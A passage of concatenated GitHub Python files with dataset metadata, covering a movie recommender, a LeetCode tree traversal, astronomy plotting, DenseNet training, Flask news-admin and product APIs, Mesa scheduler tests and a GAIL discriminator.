pd\nimport numpy as np\n\n\n# In[4]:\n\n\ndf = pd.read_csv(\"tmdb_5000_movies.csv\")\n\n\n# In[5]:\n\n\ndf.shape\n\n\n# In[6]:\n\n\ndf.head()\n\n\n# In[7]:\n\n\ndf.columns\n\n\n# In[22]:\n\n\nfeatures = ['keywords','production_companies','genres']\nfor feature in features:\n df[feature] = df[feature].fillna('')\n\n\n# In[23]:\n\n\ndef combine_feature(row):\n try:\n \n return row['keywords'] + \" \"+ row['production_companies'] + \" \"+ row['genres'] \n except:\n print(row)\n\ndf['combined_features']=df.apply(combine_feature, axis =1)\n\n\n# In[24]:\n\n\ndf.iloc[0]['combined_features']\n\n\n# In[26]:\n\n\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\n\n\n# In[27]:\n\n\ncv = CountVectorizer()\ncount_matrix = cv.fit_transform(df['combined_features'])\ncosine_model = cosine_similarity(count_matrix)\n\n\n# In[28]:\n\n\ncosine_model_df = pd.DataFrame(cosine_model)\ncosine_model_df.head()\n\n\n# In[29]:\n\n\ncosine_model_df = pd.DataFrame(cosine_model, index = df.title, columns = df.title)\ncosine_model_df.head()\n\n\n# In[32]:\n\n\ndef make_recommendations(movie_user_likes):\n return cosine_model_df[movie_user_likes].sort_values(ascending=False)[:20]\n\nmake_recommendations('Bang')\n\n\n# In[33]:\n\n\nmake_recommendations('Spider-Man 3')\n\n\n# In[34]:\n\n\nmake_recommendations('Men in Black 3')\n\n\n# In[35]:\n\n\nmake_recommendations('Titanic')\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"aman-source/Movie-Recommnder-System-ML","sub_path":"Untitled42.py","file_name":"Untitled42.py","file_ext":"py","file_size_in_byte":1471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"22521381367","text":"#!/usr/bin/env python\nfrom typing import List\nfrom collections import defaultdict\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\nclass Solution:\n def verticalTraversal(self, root: TreeNode) -> List[List[int]]:\n info = defaultdict(list)\n\n def dfs(node, x, y):\n if node is None: return\n info[y].append((node.val, x, y))\n dfs(node.left, x + 1, y - 1)\n dfs(node.right, x + 1, y + 1)\n\n dfs(root, 0, 0)\n res = []\n for k in sorted(info):\n nodes = info[k]\n res.append([t[0] for t in sorted(nodes, key=lambda x:(x[1], x[0]))])\n return res","repo_name":"ftakanashi/JobProjects","sub_path":"LeetCode/987.二叉树的垂序遍历/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"43787988820","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport cartopy\nimport cartopy.crs as ccrs\n\n\ndef plot_mollweide(ra_dec_coords, degrees=False):\n fig = plt.figure(figsize=(10, 5))\n ax = fig.add_subplot(111, projection=\"mollweide\", axisbg='LightCyan')\n ax.grid(True)\n for coords in ra_dec_coords:\n fov = np.array(coords)\n ra = fov[:, 0]\n dec = fov[:, 1]\n if degrees:\n ra = np.deg2rad(ra)\n dec = np.deg2rad(dec)\n ax.plot(ra, dec, '.')\n\n\ndef plot_az_alt_cartesian(all_altaz_coords):\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.grid(True)\n ax.set_ylabel('Alt (deg)')\n ax.set_xlabel('Az (deg)')\n for coords in all_altaz_coords[:]:\n alts = []\n azs = []\n for coord in coords:\n alts.append(coord.alt.value)\n azs.append(coord.az.value)\n ax.plot(azs, alts, '.')\n ax.plot()\n ax.set_ylim(15, 70)\n\n\ndef plot_orthographic_projection(all_altaz_coords, central_longitude, central_latitude, az_offset):\n plt.figure(figsize=(9, 9))\n ax = plt.axes(projection=ccrs.Orthographic(central_longitude, central_latitude))\n\n ax.set_global()\n ax.gridlines()\n\n colors = 'bgrcmyk'\n\n ax.plot(range(-180, 180, 1), [65] * len(range(-180, 180, 1)), color='black', linewidth=1, marker='.',\n transform=ccrs.Geodetic())\n # 25 degrees off zenith\n\n for i, corners in enumerate(all_altaz_coords):\n lats = []\n lons = []\n for corner in corners:\n lats.append(corner.alt.value)\n lons.append(corner.az.value - az_offset)\n\n ax.scatter(lons, lats,\n color=colors[i], marker='o', transform=ccrs.Geodetic())\n\n\ndef plot_gnomonic_projection(all_altaz_coords, az_offset):\n plt.figure(figsize=(9, 9))\n ax = plt.axes(projection=ccrs.Gnomonic(central_latitude=90))\n\n ax.set_global()\n ax.gridlines()\n\n colors = 'bgrcmyk'\n\n ax.plot(range(-180, 180, 1), [65] * len(range(-180, 180, 1)), color='black', linewidth=1, marker='.',\n transform=ccrs.Geodetic())\n # 25 degrees off zenith\n\n for i, coords in enumerate(all_altaz_coords):\n lats = []\n lons = []\n for coord in coords:\n lats.append(coord.alt.value)\n lons.append(coord.az.value - az_offset)\n\n ax.scatter(lons, lats,\n color=colors[i], marker='o', transform=ccrs.Geodetic())\n","repo_name":"PolarMesosphericClouds/SkyWinder-Analysis","sub_path":"skywinder_analysis/lib/pointing/plotting_pointing_solutions.py","file_name":"plotting_pointing_solutions.py","file_ext":"py","file_size_in_byte":2422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"45623104174","text":"# coding=utf-8\nfrom __future__ import print_function\nfrom __future__ import division\n\nimport tensorflow as tf\nimport numpy as np\nimport os\nimport densenet as DenseNet\nimport input_data\n\nBATCH_SIZE = 128\nHEIGHT = input_data.HEIGHT\nWIDTH = input_data.WIDTH\nCHANNELS = 3\nCLASSES = DenseNet.CLASSES\n\n\nKEEP_PROB = 0.8\n#MAX_STEPS = 44000\n#initial_lr = 0.002\nMAX_STEPS = 80000\ninitial_lr = 0.1\n\nsaved_ckpt_path = './checkpoint/'\nsaved_summary_train_path = './summary/train/'\nsaved_summary_test_path = './summary/test/'\n\nwith tf.name_scope('input'):\n x = tf.placeholder(dtype=tf.float32, shape=[None, HEIGHT, WIDTH, CHANNELS], name='x_input')\n y = tf.placeholder(dtype=tf.int32, shape=[None], name='label')\n keep_prob = tf.placeholder(dtype=tf.float32, name='keep_prob')\n y_onehot = tf.one_hot(y, CLASSES, dtype=tf.float32)\n\nlogits = DenseNet.densenet_cifar(x, keep_prob, True)\n\nwith tf.name_scope(\"loss\"):\n loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y_onehot, logits=logits, name='loss'))\n tf.summary.scalar('loss', loss)\n\n\nwith tf.name_scope('learning_rate'):\n lr = tf.Variable(initial_lr, dtype=tf.float32)\n tf.summary.scalar('learning_rate', lr)\n\n#optimizer = tf.train.AdamOptimizer(lr).minimize(loss)\noptimizer = tf.train.MomentumOptimizer(learning_rate=lr, momentum=0.9).minimize(loss)\n\nwith tf.name_scope('accuracy'):\n softmax = tf.nn.softmax(logits, axis=-1)\n correct_prediction = tf.equal(tf.argmax(y_onehot, 1), tf.argmax(softmax, 1))\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n tf.summary.scalar('accuracy', accuracy)\n\nmerged = tf.summary.merge_all()\n\ntrain_data = input_data.read_train_data()\ntest_data = input_data.read_test_data()\n\nwith tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n\n saver = tf.train.Saver()\n\n # if os.path.exists(saved_ckpt_path):\n ckpt = tf.train.get_checkpoint_state(saved_ckpt_path)\n if ckpt and ckpt.model_checkpoint_path:\n saver.restore(sess, ckpt.model_checkpoint_path)\n print(\"Model restored...\")\n\n # saver.restore(sess, './checkpoint/densenet.model-30000')\n\n train_summary_writer = tf.summary.FileWriter(saved_summary_train_path, sess.graph)\n test_summary_writer = tf.summary.FileWriter(saved_summary_test_path, sess.graph)\n\n\n for i in range(0, MAX_STEPS + 1):\n train_img_data, train_lables = train_data.next_batch(BATCH_SIZE, 'train')\n test_img_data, test_labels = test_data.next_batch(BATCH_SIZE)\n\n train_summary, _ = sess.run([merged, optimizer], feed_dict={x: train_img_data, y: train_lables, keep_prob: KEEP_PROB})\n train_summary_writer.add_summary(train_summary, i)\n test_summary = sess.run(merged, feed_dict={x: test_img_data, y: test_labels, keep_prob: 1.0})\n test_summary_writer.add_summary(test_summary, i)\n\n\n train_accuracy, train_loss_val = sess.run([accuracy, loss], feed_dict={x: train_img_data, y: train_lables,\n keep_prob: 1.0})\n test_accuracy, test_loss_val = sess.run([accuracy, loss], feed_dict={x: test_img_data, y: test_labels,\n keep_prob: 1.0})\n\n if i % 10 == 0:\n learning_rate = sess.run(lr)\n print(\n \"train step: %d, learning rate: %f, train loss: %f, train accuracy: %f, test loss: %f, test accuracy: %f\" % (\n i, learning_rate, train_loss_val, train_accuracy, test_loss_val,\n test_accuracy))\n\n if i % 10000 == 0:\n saver.save(sess, os.path.join(saved_ckpt_path, 'densenet.model'), global_step=i)\n\n if i == 40000 or i == 60000:\n sess.run(tf.assign(lr, 0.1 * lr))\n","repo_name":"zhulf0804/DenseNet-Tensorflow","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"41618458135","text":"from flask import Blueprint, request, g, jsonify\nfrom flask import redirect, current_app\nfrom flask import render_template\nfrom flask import session\nfrom datetime import datetime\nimport time,random\nfrom utils.qcloud_cos import qlcoud_cos\n\nfrom models import UserInfo, NewsInfo, NewsCategory, db\n\nadmin_blueprint = Blueprint('admin', __name__, url_prefix='/admin')\n\n\n@admin_blueprint.route('/m/login', methods=['GET', 'POST'])\ndef login():\n if request.method == 'GET':\n return render_template('admin/login.html')\n # post请求,查询数据\n name = request.form.get('username')\n pwd = request.form.get('password')\n\n if not all([name, pwd]):\n return render_template('admin/login.html', msg='请填写用户名、密码')\n\n user = UserInfo.query.filter_by(mobile=name, isAdmin=True).first()\n if user:\n if user.check_pwd(pwd):\n # 登录成功\n session['admin_id'] = user.id\n return redirect('/admin/m')\n else:\n return render_template('admin/login.html', msg='密码错误')\n else:\n return render_template('admin/login.html', msg='用户名错误')\n\n\n# @app.before_request\n@admin_blueprint.before_request\ndef login_valid():\n # 当大部分视图都执行一段代码时,则将这段代码封装到请求勾子函数中\n # 排除小部分视图\n ignore_list = ['/admin/m/login', ]\n if request.path not in ignore_list:\n if 'admin_id' not in session:\n return redirect('/admin/m/login')\n g.user = UserInfo.query.get(session.get('admin_id'))\n\n\n@admin_blueprint.route('/m')\ndef index():\n return render_template('admin/index.html')\n\n\n@admin_blueprint.route('/logout')\ndef logout():\n del session['admin_id']\n return redirect('/admin/m/login')\n\n\n# 用户统计\n@admin_blueprint.route('/usercount')\ndef usercount():\n # 用户总数\n total_count = UserInfo.query.filter_by(isAdmin=False).count()\n\n now = datetime.now()\n\n # 用户月新增数:本月注册的用户数量\n month_first = datetime(now.year, now.month, 1)\n month_count = UserInfo.query. \\\n filter_by(isAdmin=False). \\\n filter(UserInfo.create_time >= month_first). \\\n count()\n\n # 用户日新增数:今天注册的用户数量\n day_first = datetime(now.year, now.month, now.day)\n day_count = UserInfo.query. \\\n filter_by(isAdmin=False). \\\n filter(UserInfo.create_time >= day_first). \\\n count()\n\n # 用户登录活跃数\n key = 'login' + now.strftime('%Y%m%d')\n redis_cli = current_app.redis_cli\n times = redis_cli.hkeys(key)\n counts = redis_cli.hvals(key)\n # 从redis中读取出来的数据,是bytes类型\n # print(times)[b'08:00', b'09:00', b'10:00'。。。]\n # print(counts)[b'356', b'410', b'284',。。。]\n\n # 将bytes转换成str 字符串.encode() 字节.decode()\n times = [item.decode() for item in times]\n # print(times)\n # 将bytes转换成int\n counts = [int(item) for item in counts]\n # print(counts)\n\n return render_template(\n 'admin/user_count.html',\n total_count=total_count,\n month_count=month_count,\n day_count=day_count,\n times=times,\n counts=counts\n )\n\n\n# 新闻审核列表\n@admin_blueprint.route('/news_review')\ndef news_review1():\n return render_template('admin/news_review.html')\n\n\n# 新闻审核列表数据\n@admin_blueprint.route('/news_review2')\ndef news_review2():\n # 搜索关键字\n title = request.args.get('title')\n # 页码\n page = int(request.args.get('page', 1))\n\n type = int(request.args.get('type', 1))\n\n # 拼接查询语句\n query = NewsInfo.query\n if title:\n # 查询新闻标题包括指定字符串的数据\n query = query.filter(NewsInfo.title.contains(title))\n if type==2:\n pagination = query.order_by(NewsInfo.status.asc(), NewsInfo.id.desc()).paginate(page, 10, False)\n else:\n pagination = query.order_by(NewsInfo.id.desc()).filter_by(status=2).paginate(page, 10, False)\n # 获取当前页的数据\n news_list = pagination.items\n # 获取总页数\n total_page = pagination.pages\n\n # 最终返回json数据,需要将news_list转成字典\n news_list2 = []\n for news in news_list:\n news_list2.append({\n 'id': news.id,\n 'title': news.title,\n 'create_time': news.create_time.strftime('%Y-%m-%d %H:%M:%S'),\n 'status': news.status\n })\n\n return jsonify(news_list=news_list2, total_page=total_page)\n\n\n@admin_blueprint.route('/type_list')\ndef type_list():\n return render_template('admin/news_type.html')\n\n\n@admin_blueprint.route('/type_list_json')\ndef type_list_json():\n # 查询\n category_list = NewsCategory.query.all()\n\n # 对象转字典\n category_list2 = []\n for category in category_list:\n category_list2.append({\n 'id': category.id,\n 'name': category.name\n })\n\n # 返回json\n return jsonify(category_list=category_list2)\n\n\n@admin_blueprint.route('/type_add', methods=['POST'])\ndef type_add():\n # 接收\n name = request.form.get('name')\n\n # 验证\n # 1.非空\n if not name:\n return jsonify(result=1)\n # 2.是否存在此名称\n if NewsCategory.query.filter_by(name=name).count() > 0:\n return jsonify(result=2)\n\n # 处理:添加\n category = NewsCategory()\n category.name = name\n db.session.add(category)\n db.session.commit()\n\n # 响应\n return jsonify(result=3)\n\n\n@admin_blueprint.route('/type_edit/', methods=['POST'])\ndef type_edit(category_id):\n # 参数:主键,name\n name = request.form.get('name')\n\n # 验证\n if not name:\n return jsonify(result=1)\n # 是否重复:如果未修改则提示请修改,如果修改为重复别称,则提示重复\n category = NewsCategory.query.get(category_id)\n # 未修改直接提交\n if category.name == name:\n return jsonify(result=2)\n # 修改后,如果名称重复,则返回\n if NewsCategory.query.filter_by(name=name).count() > 0:\n return jsonify(result=3)\n\n # 处理:修改\n category.name = name\n db.session.commit()\n\n # 响应\n return jsonify(result=4)\n\n\n# 用户列表\n@admin_blueprint.route('/user_list')\ndef user_list():\n page = int(request.args.get('page', 1))\n users = UserInfo.query.filter_by(isAdmin=False).paginate(page, 10, False)\n users_list = users.items\n users_list_pages = users.pages\n return render_template('admin/user_list.html', page=page, users_list=users_list, users_list_pages=users_list_pages)\n\n\n# 新闻编辑\n@admin_blueprint.route('/news_edit')\ndef news_edit():\n return render_template('admin/news_edit.html')\n\n# 新闻编辑页面\n@admin_blueprint.route('/news_edit/', methods=['GET', 'POST'])\ndef news_edit_detail(news_id):\n if request.method == 'GET':\n news = NewsInfo.query.get(news_id)\n category = NewsCategory.query.all()\n return render_template('admin/news_edit_detail.html', news=news,category=category)\n\n title = request.form.get('title')\n category = request.form.get('category')\n summary = request.form.get('summary')\n content = request.form.get('content')\n pic = request.files.get('pic')\n news = NewsInfo.query.get(news_id)\n if pic:\n # 将图片上传到腾讯云\n nowTime = lambda: int(round(time.time() * 1000))\n file_name = str(random.random()) + str(nowTime()) + pic.filename\n qlcoud_cos.upload_img(pic, file_name)\n news.pic = file_name;\n\n news.title = title\n news.category_id = category\n news.summary = summary\n news.context = content\n db.session.commit()\n return redirect('/admin/news_edit')\n\n# 新闻审核\n@admin_blueprint.route('/news_review_detail/', methods=['GET', 'POST'])\ndef news_review_detail(news_id):\n if request.method == 'GET':\n news = NewsInfo.query.get(news_id)\n category = NewsCategory.query.get(news.category_id)\n return render_template('admin/news_review_detail.html', news=news,category=category)\n # 更新数据\n action = int(request.form.get('action',2))\n reason = request.form.get('reason','reason')\n news = NewsInfo.query.get(news_id)\n # 用户文章数+1\n user = UserInfo.query.get(news.user_id)\n if action == 2:\n user.public_count += 1\n else:\n if news.status == 2:\n user.public_count -= 1\n # 新闻更新\n news.status = action\n news.reason = reason\n\n # 向数据库添加数据\n db.session.commit()\n\n return redirect('/admin/news_review')\n","repo_name":"k2tv/news","sub_path":"view_admin.py","file_name":"view_admin.py","file_ext":"py","file_size_in_byte":8649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"16566219019","text":"\"\"\"\nTest the advanced schedulers.\n\"\"\"\n\nimport unittest\nfrom unittest import TestCase, mock\nfrom mesa import Model, Agent\nfrom mesa.time import (\n BaseScheduler,\n StagedActivation,\n RandomActivation,\n SimultaneousActivation,\n)\n\nRANDOM = \"random\"\nSTAGED = \"staged\"\nSIMULTANEOUS = \"simultaneous\"\n\n\nclass MockAgent(Agent):\n \"\"\"\n Minimalistic agent for testing purposes.\n \"\"\"\n\n def __init__(self, unique_id, model):\n super().__init__(unique_id, model)\n self.steps = 0\n self.advances = 0\n\n def stage_one(self):\n self.model.log.append(self.unique_id + \"_1\")\n\n def stage_two(self):\n self.model.log.append(self.unique_id + \"_2\")\n\n def advance(self):\n self.advances += 1\n\n def step(self):\n self.steps += 1\n\n\nclass MockModel(Model):\n def __init__(self, shuffle=False, activation=STAGED):\n \"\"\"\n Creates a Model instance with a schedule\n\n Args:\n shuffle (Bool): whether or not to instantiate a scheduler\n with shuffling.\n This option is only used for\n StagedActivation schedulers.\n\n activation (str): which kind of scheduler to use.\n 'random' creates a RandomActivation scheduler.\n 'staged' creates a StagedActivation scheduler.\n The default scheduler is a BaseScheduler.\n \"\"\"\n self.log = []\n\n # Make scheduler\n if activation == STAGED:\n model_stages = [\"stage_one\", \"stage_two\"]\n self.schedule = StagedActivation(self, model_stages, shuffle=shuffle)\n elif activation == RANDOM:\n self.schedule = RandomActivation(self)\n elif activation == SIMULTANEOUS:\n self.schedule = SimultaneousActivation(self)\n else:\n self.schedule = BaseScheduler(self)\n\n # Make agents\n for name in [\"A\", \"B\"]:\n agent = MockAgent(name, self)\n self.schedule.add(agent)\n\n def step(self):\n self.schedule.step()\n\n\nclass TestStagedActivation(TestCase):\n \"\"\"\n Test the staged activation.\n \"\"\"\n\n expected_output = [\"A_1\", \"B_1\", \"A_2\", \"B_2\"]\n\n def test_no_shuffle(self):\n \"\"\"\n Testing staged activation without shuffling.\n \"\"\"\n model = MockModel(shuffle=False)\n model.step()\n model.step()\n assert all([i == j for i, j in zip(model.log[:4], model.log[4:])])\n\n def test_shuffle(self):\n \"\"\"\n Test staged activation with shuffling\n \"\"\"\n model = MockModel(shuffle=True)\n model.step()\n for output in self.expected_output[:2]:\n assert output in model.log[:2]\n for output in self.expected_output[2:]:\n assert output in model.log[2:]\n\n def test_shuffle_shuffles_agents(self):\n model = MockModel(shuffle=True)\n model.random = mock.Mock()\n assert model.random.shuffle.call_count == 0\n model.step()\n assert model.random.shuffle.call_count == 1\n\n def test_remove(self):\n \"\"\"\n Test staged activation can remove an agent\n \"\"\"\n model = MockModel(shuffle=True)\n agent_keys = list(model.schedule._agents.keys())\n agent = model.schedule._agents[agent_keys[0]]\n model.schedule.remove(agent)\n assert agent not in model.schedule.agents\n\n def test_add_existing_agent(self):\n model = MockModel()\n agent = model.schedule.agents[0]\n with self.assertRaises(Exception):\n model.schedule.add(agent)\n\n\nclass TestRandomActivation(TestCase):\n \"\"\"\n Test the random activation.\n \"\"\"\n\n def test_random_activation_step_shuffles(self):\n \"\"\"\n Test the random activation step\n \"\"\"\n model = MockModel(activation=RANDOM)\n model.random = mock.Mock()\n model.schedule.step()\n assert model.random.shuffle.call_count == 1\n\n def test_random_activation_step_increments_step_and_time_counts(self):\n \"\"\"\n Test the random activation step increments step and time counts\n \"\"\"\n model = MockModel(activation=RANDOM)\n assert model.schedule.steps == 0\n assert model.schedule.time == 0\n model.schedule.step()\n assert model.schedule.steps == 1\n assert model.schedule.time == 1\n\n def test_random_activation_step_steps_each_agent(self):\n \"\"\"\n Test the random activation step causes each agent to step\n \"\"\"\n\n model = MockModel(activation=RANDOM)\n model.step()\n agent_steps = [i.steps for i in model.schedule.agents]\n # one step for each of 2 agents\n assert all(map(lambda x: x == 1, agent_steps))\n\n\nclass TestSimultaneousActivation(TestCase):\n \"\"\"\n Test the simultaneous activation.\n \"\"\"\n\n def test_simultaneous_activation_step_steps_and_advances_each_agent(self):\n \"\"\"\n Test the simultaneous activation step causes each agent to step\n \"\"\"\n model = MockModel(activation=SIMULTANEOUS)\n model.step()\n # one step for each of 2 agents\n agent_steps = [i.steps for i in model.schedule.agents]\n agent_advances = [i.advances for i in model.schedule.agents]\n assert all(map(lambda x: x == 1, agent_steps))\n assert all(map(lambda x: x == 1, agent_advances))\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"tpike3/SugarScape","sub_path":"venv/Lib/site-packages/tests/test_time.py","file_name":"test_time.py","file_ext":"py","file_size_in_byte":5476,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"77"} +{"seq_id":"6572401073","text":"from flask import Blueprint, request, jsonify\n\nfrom server.models import Product\nfrom server import db\n\nmarket = Blueprint('market', __name__)\n\n@market.route('/api/product/add', methods=['POST'])\ndef add_product():\n try:\n name = request.json.get('name')\n description = request.json.get('description')\n price = request.json.get('price')\n db.session.add(Product(name=name, desc=description, price=price))\n db.session.commit()\n except: \n return jsonify(result={\n 'message': 'Produkt nie został dodany do bazy, spróbuj później.',\n 'category': 'danger'\n })\n return jsonify(result={\n 'message': 'Produkt został pomyślnie dodany.',\n 'catrgory': 'success'\n })\n \n@market.route('/api/product/del/')\ndef remove_product(product_id):\n product = Product.query.filter_by(id=product_id).first_or_404()\n return jsonify(result={\n 'message': 'Produkt został usunięty',\n 'category': 'info'\n })\n\n@market.route('/api/product/update/', methods=['POST'])\ndef update_product(product_id):\n allowed_fields = ('name', 'desc', 'price')\n product = Product.query.filter_by(id=product_id).first_or_404()\n\n for field in allowed_fields:\n fieldValue = request.json.get(field)\n\n if fieldValue is not None:\n setattr(product, field, fieldValue)\n db.session.commit()\n\n return jsonify(result={\n 'message': 'Produkt został zaaktualizowany',\n 'info': 'success'\n })\n\n@market.route('/api/products', methods=['GET'])\ndef products():\n products = Product.query.all()\n data = []\n for product in products:\n data.append(dict(product={\n 'id': product.id,\n 'name': product.name,\n 'price': product.price,\n 'description': product.desc,\n 'add_date': product.add_date.strftime(\"%Y/%m/%d, %H:%M:%S\"),\n }))\n return jsonify(result=data)\n\n","repo_name":"coding-tree/flask-react","sub_path":"server/market/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"12614627920","text":"import tensorflow as tf\nimport numpy as np\nimport gym\nfrom gym.spaces import Box, Discrete\nimport pandas as pd\n\n\"\"\"\nfor make this program \nI refferd https://github.com/uidilr/gail_ppo_tf/blob/master/network_models/discriminator.py\n\"\"\"\n\ndef logsigmoid(a):\n '''Equivalent to tf.log(tf.sigmoid(a))'''\n return -tf.nn.softplus(-a)\n\n\"\"\" Reference: https://github.com/openai/imitation/blob/99fbccf3e060b6e6c739bdf209758620fcdefd3c/policyopt/thutil.py#L48-L51\"\"\"\n\ndef logit_bernoulli_entropy(logits):\n ent = (1.-tf.nn.sigmoid(logits))*logits - logsigmoid(logits)\n return ent\n\n#######from core for every dimention envs\ndef combined_shape(length, shape=None):#例えばactが1次元のときaction_space.shape=()と空集合となるためうまくやる\n if shape is None:\n return (length,)\n elif shape == ():\n return (length,1)#!(none,1)と1次元化\n return (length, shape) if np.isscalar(shape) else (length, *shape)\n\ndef placeholder(dim=None):\n return tf.placeholder(dtype=tf.float32, shape=combined_shape(None,dim))\n'''\ndef placeholder_from_space(space):\n if isinstance(space, Box):#連続値なら、、、\n return placeholder(space.shape)\n elif isinstance(space, Discrete):\n return tf.placeholder(dtype=tf.float32, shape=(None,))#離散値なら1次元?? #!debugのためint → floatに変更\n raise NotImplementedError\n'''\n##########\n\ndef proper_shape(arr):#!input numpyarray\n if arr.ndim==1:\n return np.reshape(arr,(arr.shape[0],1))\n return arr\n\n\n\nclass Discriminator():\n def __init__(self,env, hidden_size, entcoeff=0.001, lr_rate=1e-3, scope=\"adversary\", reward_type='negative'):\n \n with tf.variable_scope(scope):\n self.scope = scope\n self.observation_shape = env.observation_space.shape\n self.actions_shape = env.action_space.shape\n self.hidden_size = hidden_size\n self.build_ph()\n\n \n\n # Build grpah\n with tf.variable_scope('network') as network_scope:\n generator_logits = self.build_graph(self.generator_obs_ph, self.generator_acs_ph, reuse=False)#generatorはAgentの行動である確率\n expert_logits = self.build_graph(self.expert_obs_ph, self.expert_acs_ph, reuse=True)#generatorのグラフをコピー\n # Build accuracy\n with tf.variable_scope('loss'):\n generator_acc = tf.reduce_mean(tf.to_float(tf.nn.sigmoid(generator_logits) < 0.5))#agentの行動がEXPERTである確率(Dの判断)が0.5以下なら1、それ以上なら0(正解)としてDの正解率を計算\n expert_acc = tf.reduce_mean(tf.to_float(tf.nn.sigmoid(expert_logits) > 0.5))\n # Build regression loss\n # let x = logits, z = targets.\n # z * -log(sigmoid(x)) + (1 - z) * -log(1 - sigmoid(x))\n generator_loss = tf.nn.sigmoid_cross_entropy_with_logits(logits=generator_logits, labels=tf.zeros_like(generator_logits))#labelはすべて0(全て間違い)\n generator_loss = tf.reduce_mean(generator_loss)\n expert_loss = tf.nn.sigmoid_cross_entropy_with_logits(logits=expert_logits, labels=tf.ones_like(expert_logits))#すべて正解\n expert_loss = tf.reduce_mean(expert_loss)\n # Build entropy loss\n logits = tf.concat([generator_logits, expert_logits], 0)\n entropy = tf.reduce_mean(logit_bernoulli_entropy(logits))\n entropy_loss = -entcoeff*entropy#エントロピー項をentcoeff倍(影響を調節)\n # Loss + Accuracy terms\n self.losses = [generator_loss, expert_loss, entropy, entropy_loss, generator_acc, expert_acc]\n self.loss_name = [\"generator_loss\", \"expert_loss\", \"entropy\", \"entropy_loss\", \"generator_acc\", \"expert_acc\"]\n self.total_loss = generator_loss + expert_loss + entropy_loss\n \n optimizer = tf.train.AdamOptimizer()\n self.train_op = optimizer.minimize(self.total_loss)\n \n # Build Reward for policy\n #self.reward_op = -tf.log(1-tf.nn.sigmoid(generator_logits)+1e-8)#つねに正の報酬\n log_d_g= tf.reduce_mean(tf.log(1-tf.nn.sigmoid(generator_logits)+1e-8))\n log_1_d_e= tf.reduce_mean(tf.log(tf.nn.sigmoid(expert_logits)+1e-8))\n self.js_div = (log_d_g + log_1_d_e)/2.0+ tf.log(2.0)\n #self.js_div = tf.clip_by_value(self.js_div,1e-8,1.0)#!dontclip\n self.reward_op_negat = tf.log(tf.nn.sigmoid(generator_logits)+1e-8)\n self.reward_op_posit = -tf.log(1-tf.nn.sigmoid(generator_logits)+1e-8)\n self.reward_op_airl = self.reward_op_negat+ self.reward_op_posit\n\n reward_type_dict = {'negative':self.reward_op_negat, 'positive':self.reward_op_posit,'airl':self.reward_op_airl }\n assert reward_type in reward_type_dict,'reward_type is not in type_dict'\n \n self.reward_op = reward_type_dict[reward_type]\n \n \n def train(self,session,e_obs_buf,e_act_buf,a_obs_buf, a_act_buf):\n return session.run(self.train_op, feed_dict={self.generator_obs_ph:proper_shape(a_obs_buf),\n self.generator_acs_ph:proper_shape(a_act_buf),\n self.expert_obs_ph:proper_shape(e_obs_buf),\n self.expert_acs_ph:proper_shape(e_act_buf)})\n \n def get_js_div(self,session,e_obs_buf,e_act_buf,a_obs_buf, a_act_buf):\n return session.run(self.js_div, feed_dict={self.generator_obs_ph:proper_shape(a_obs_buf),\n self.generator_acs_ph:proper_shape(a_act_buf),\n self.expert_obs_ph:proper_shape(e_obs_buf),\n self.expert_acs_ph:proper_shape(e_act_buf)})\n \n \n\n def get_reward_buf(self,session, a_obs_buf, a_act_buf):#get_reward\n return session.run(self.reward_op_negat, feed_dict={self.generator_obs_ph: proper_shape(a_obs_buf),\n self.generator_acs_ph: proper_shape(a_act_buf)})\n\n def get_positive_reward_buf(self,session, a_obs_buf, a_act_buf):#get_reward\n return session.run(self.reward_op_posit, feed_dict={self.generator_obs_ph: proper_shape(a_obs_buf),\n self.generator_acs_ph: proper_shape(a_act_buf)})\n\n def get_airl_reward_buf(self,session, a_obs_buf, a_act_buf):#get_reward\n return session.run(self.reward_op_airl, feed_dict={self.generator_obs_ph: proper_shape(a_obs_buf),\n self.generator_acs_ph: proper_shape(a_act_buf)})\n\n def get_reward(self,session, a_obs_buf, a_act_buf):\n return session.run(self.reward_op, feed_dict={self.generator_obs_ph: proper_shape(a_obs_buf),\n self.generator_acs_ph: proper_shape(a_act_buf)})\n \n\n def build_ph(self):#make placeholder shape(None,obs.shape)\n self.generator_obs_ph = tf.placeholder(tf.float32, combined_shape(None,self.observation_shape), name=\"observations_ph\")\n self.generator_acs_ph = tf.placeholder(tf.float32, combined_shape(None,self.actions_shape), name=\"actions_ph\")\n self.expert_obs_ph = tf.placeholder(tf.float32, combined_shape(None,self.observation_shape), name=\"expert_observations_ph\")\n self.expert_acs_ph = tf.placeholder(tf.float32, combined_shape(None,self.actions_shape), name=\"expert_actions_ph\")\n\n\n def build_graph(self, obs_ph, acs_ph, reuse=False):#2層のtanhと全結合層\n with tf.variable_scope(self.scope):\n if reuse:\n tf.get_variable_scope().reuse_variables()\n \n obs = obs_ph#!とりあえず標準化なし\n _input = tf.concat([obs, acs_ph], axis=1) # concatenate the two input -> form a transition\n p_h1 = tf.contrib.layers.fully_connected(_input, self.hidden_size, activation_fn=tf.nn.tanh)\n p_h2 = tf.contrib.layers.fully_connected(p_h1, self.hidden_size, activation_fn=tf.nn.tanh)\n logits = 